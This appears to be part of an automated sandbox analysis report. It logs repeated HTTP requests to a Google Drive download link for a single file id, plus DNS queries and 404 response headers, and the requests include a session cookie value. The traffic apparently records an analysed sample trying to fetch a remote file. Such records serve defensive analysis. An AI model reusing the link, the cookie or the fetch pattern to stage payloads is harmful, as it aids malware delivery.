      Source: global trafficHTTP traffic detected: GET /download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
      Source: global trafficHTTP traffic detected: GET /download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
      Source: global trafficHTTP traffic detected: GET /download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
      Source: global trafficHTTP traffic detected: GET /download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
      Source: global trafficHTTP traffic detected: GET /download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
      Source: global trafficHTTP traffic detected: GET /download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
      Source: global trafficHTTP traffic detected: GET /download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
      Source: global trafficHTTP traffic detected: GET /download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
      Source: global trafficHTTP traffic detected: GET /download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
      Source: global trafficHTTP traffic detected: GET /download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
      Source: global trafficHTTP traffic detected: GET /download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
      Source: global trafficHTTP traffic detected: GET /download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
      Source: global trafficHTTP traffic detected: GET /download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
      Source: global trafficHTTP traffic detected: GET /download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
      Source: global trafficHTTP traffic detected: GET /download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
      Source: global trafficHTTP traffic detected: GET /download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
      Source: global trafficHTTP traffic detected: GET /download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
      Source: global trafficDNS traffic detected: DNS query: drive.google.com
      Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgQ2rQlINRCcUrcm12Z2EJjQL-kWl05VX5QWdGnN-xgU3naMid1RB4AZLUIEv6dEskZFContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 23:01:52 GMTP3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Cross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-5JFBfqfOh-lh1z2P86CmbQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerSet-Cookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz; expires=Sat, 12-Jul-2025 23:01:52 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=noneAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgSloQ9RxKEPo9SzUbDBRPO4H9dzZ5jz4K-fyghXAw8HwyuyzCFupqva2xA9587GAb5nBnw3mPMContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 23:01:54 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-cJU_FO-jrWcL_qZyu1R88g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6ZwitzzDVHzMaZHbt_fI4HrJDIW3jeotQvOFG2RIDmnH51xvf4XYYgG16uq6IS7qoOyyeZeTkContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 23:01:56 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'nonce-bgjapu7qhWEIRpelNOMYiw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
